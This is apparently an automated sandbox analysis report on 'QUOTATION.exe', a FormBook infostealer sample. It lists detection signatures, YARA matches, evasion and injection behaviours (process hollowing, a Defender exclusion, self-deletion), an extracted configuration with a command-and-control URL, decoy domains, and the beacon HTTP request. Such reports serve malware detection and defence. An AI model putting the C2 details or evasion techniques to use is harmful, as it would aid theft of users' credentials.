Windows Analysis Report QUOTATION.exe

Overview

General Information

Sample Name:	QUOTATION.exe
Analysis ID:	532906
MD5:	213d8fd4b74e3b1122cfc1a9159aa579
SHA1:	3fcea21ca260c922f371877bef1cec0b2293f1e9
SHA256:	696ba286fa1d2d46b09dee92733f9ca34bfe3e58f50a440a3ec89f63bba76441
Tags:	exeFormbook
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Yara detected AntiVM3

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Multi AV Scanner detection for dropped file

Sample uses process hollowing technique

Uses netstat to query active network connections and open ports

Maps a DLL or memory area into another process

Initial sample is a PE file and has a suspicious name

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Sigma detected: Suspicius Add Task From User AppData Temp

Modifies the prolog of user mode functions (user mode inline hooks)

Self deletion via cmd delete

.NET source code contains potential unpacker

Sigma detected: Powershell Defender Exclusion

Queues an APC in another process (thread injection)

Tries to detect virtualization through RDTSC time measurements

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Adds a directory exclusion to Windows Defender

Uses schtasks.exe or at.exe to add and modify task schedules

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

HTTP GET or POST without a user agent

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

Drops PE files

Contains functionality to read the PEB

Checks if the current process is being debugged

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Signatures

AV Detection:

Found malware configuration

Source: 00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.purelai.store/p2r0/"], "decoy": ["armory-village.net", "gailgylee.store", "hyjqjd.com", "dgastudios.com", "freedomofspain.com", "coneofpositivity.com", "wesleyb.com", "cacciatorediteglie.com", "refatu.com", "apexfreightdispatch.com", "fichesdematerialisees.com", "hoopmetaverse.com", "gesogog.com", "mosaicelevatormonitoring.com", "mrstarrtutorsmath.com", "kebalunion.com", "xn--15qv36df6am25bt2p.top", "archedbeautynw.com", "glczklft.com", "zhejiang-huayang.com", "mariogriffinphoto.com", "metomecetefur.rest", "sabimode.com", "pityporg.online", "plumbinghelp411.com", "neontvplay.com", "hellofurb.com", "jamerah.com", "alarshllc.com", "secure2work.cloud", "wanderlustwallart.com", "altinayrent.com", "odishaparagliding.com", "jijijfiaf.xyz", "zaracentres.com", "shorthillsnjhomespecialists.com", "everdayevolution.net", "kpopyostore.com", "bitsandbuds.com", "dalstudio.net", "anh-law.com", "ecogreenhanukkah.com", "ittibrief.com", "itargetcampaigns.com", "abczqzhkmu.com", "dentistslexington.com", "searchinmetaverse.com", "mypharmatea.com", "omdeforoush.com", "bbtenzymes.com", "thefactologist.com", "mki-sb.com", "escrowtimeonline.com", "global-therm.com", "yourlifedesignjourney.com", "318donate.com", "montessori-academies.com", "virgotalk.com", "alvincjohnson.com", "hxcopymrerem.biz", "gslean.com", "darknessnft.com", "hummelconstrllc.com", "metaversefed.com"]}

Multi AV Scanner detection for submitted file

Source: QUOTATION.exe	Virustotal: Detection: 40%			Perma Link
Source: QUOTATION.exe	ReversingLabs: Detection: 18%

Yara detected FormBook

Source: Yara match	File source: 17.0.QUOTATION.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.QUOTATION.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.QUOTATION.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.QUOTATION.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.QUOTATION.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.332122675.000000000FD1B000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.296229460.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.378010421.0000000000B40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.545541618.0000000000D20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.295558217.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.300134534.0000000003739000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.378361969.0000000000F70000.00000040.00020000.sdmp, type: MEMORY

Antivirus detection for URL or domain

Source: http://www.purelai.store/p2r0/?U2JXS=kHZbGirW+rtifSnrplUrhxYS41BJcQ1JCeh0wMn6PQuFvfZqsbftW9WXbX4R7rV3sWuJ&cH=-ZeTxXnX	Avira URL Cloud: Label: malware
Source: www.purelai.store/p2r0/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe

ReversingLabs: Detection: 18%

Antivirus or Machine Learning detection for unpacked file

Source: 17.0.QUOTATION.exe.400000.6.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 17.0.QUOTATION.exe.400000.4.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 17.2.QUOTATION.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 17.0.QUOTATION.exe.400000.8.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files

Source: QUOTATION.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: QUOTATION.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: netstat.pdbGCTL source: QUOTATION.exe, 00000011.00000002.378505567.0000000000FA0000.00000040.00020000.sdmp
Source:	Binary string: netstat.pdb source: QUOTATION.exe, 00000011.00000002.378505567.0000000000FA0000.00000040.00020000.sdmp
Source:	Binary string: wntdll.pdbUGP source: QUOTATION.exe, 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, QUOTATION.exe, 00000011.00000002.378732031.00000000010CF000.00000040.00000001.sdmp, NETSTAT.EXE, 00000018.00000002.547801990.0000000003220000.00000040.00000001.sdmp, NETSTAT.EXE, 00000018.00000002.548437267.000000000333F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: QUOTATION.exe, QUOTATION.exe, 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, QUOTATION.exe, 00000011.00000002.378732031.00000000010CF000.00000040.00000001.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000018.00000002.547801990.0000000003220000.00000040.00000001.sdmp, NETSTAT.EXE, 00000018.00000002.548437267.000000000333F000.00000040.00000001.sdmp

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 4x nop then pop edi		17_2_00416CEA
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 4x nop then pop edi		24_2_00746CEA

Networking:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.purelai.store
Source: C:\Windows\explorer.exe	Network Connect: 208.51.62.42 80			Jump to behavior

Uses netstat to query active network connections and open ports

Source: C:\Users\user\Desktop\QUOTATION.exe

Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.purelai.store/p2r0/

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /p2r0/?U2JXS=kHZbGirW+rtifSnrplUrhxYS41BJcQ1JCeh0wMn6PQuFvfZqsbftW9WXbX4R7rV3sWuJ&cH=-ZeTxXnX HTTP/1.1Host: www.purelai.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: QUOTATION.exe, 00000001.00000002.299185343.000000000276E000.00000004.00000001.sdmp, QUOTATION.exe, 00000001.00000002.299134882.0000000002731000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: NETSTAT.EXE, 00000018.00000002.549103186.0000000003C3F000.00000004.00020000.sdmp	String found in binary or memory: https://wildcard.hostgator.com/p2r0/?U2JXS=zl7ruCTqPiUCF1L

Source: unknown

DNS traffic detected: queries for: www.purelai.store

Source: global traffic

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 17.0.QUOTATION.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.QUOTATION.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.QUOTATION.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.QUOTATION.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.QUOTATION.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.332122675.000000000FD1B000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.296229460.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.378010421.0000000000B40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.545541618.0000000000D20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.295558217.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.300134534.0000000003739000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.378361969.0000000000F70000.00000040.00020000.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Source: 17.0.QUOTATION.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.0.QUOTATION.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.0.QUOTATION.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.0.QUOTATION.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.0.QUOTATION.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.0.QUOTATION.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.0.QUOTATION.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.0.QUOTATION.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.2.QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.2.QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.0.QUOTATION.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.0.QUOTATION.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.2.QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.2.QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000000.332122675.000000000FD1B000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000000.332122675.000000000FD1B000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000000.296229460.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000000.296229460.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.378010421.0000000000B40000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.378010421.0000000000B40000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000018.00000002.545541618.0000000000D20000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000018.00000002.545541618.0000000000D20000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000000.295558217.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000000.295558217.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.300134534.0000000003739000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.300134534.0000000003739000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.378361969.0000000000F70000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.378361969.0000000000F70000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: QUOTATION.exe

Uses 32bit PE files

Source: QUOTATION.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Yara signature match

Source: 17.0.QUOTATION.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.0.QUOTATION.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.0.QUOTATION.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.0.QUOTATION.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.0.QUOTATION.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.0.QUOTATION.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.0.QUOTATION.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.0.QUOTATION.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.2.QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.2.QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.0.QUOTATION.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.0.QUOTATION.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.2.QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.2.QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000013.00000000.332122675.000000000FD1B000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000013.00000000.332122675.000000000FD1B000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000000.296229460.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000000.296229460.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.378010421.0000000000B40000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.378010421.0000000000B40000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000018.00000002.545541618.0000000000D20000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000018.00000002.545541618.0000000000D20000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000000.295558217.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000000.295558217.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.300134534.0000000003739000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.300134534.0000000003739000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.378361969.0000000000F70000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.378361969.0000000000F70000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Detected potential crypto function

Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 1_2_00DAE778	1_2_00DAE778
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 1_2_00DAE76B	1_2_00DAE76B
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 1_2_00DABDC4	1_2_00DABDC4
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 1_2_00362050	1_2_00362050
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 13_2_00332050	13_2_00332050
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_00401030	17_2_00401030
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_0041E887	17_2_0041E887
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_0041D969	17_2_0041D969
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_00402D90	17_2_00402D90
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_00409E5B	17_2_00409E5B
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_00409E60	17_2_00409E60
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_0041DFCE	17_2_0041DFCE
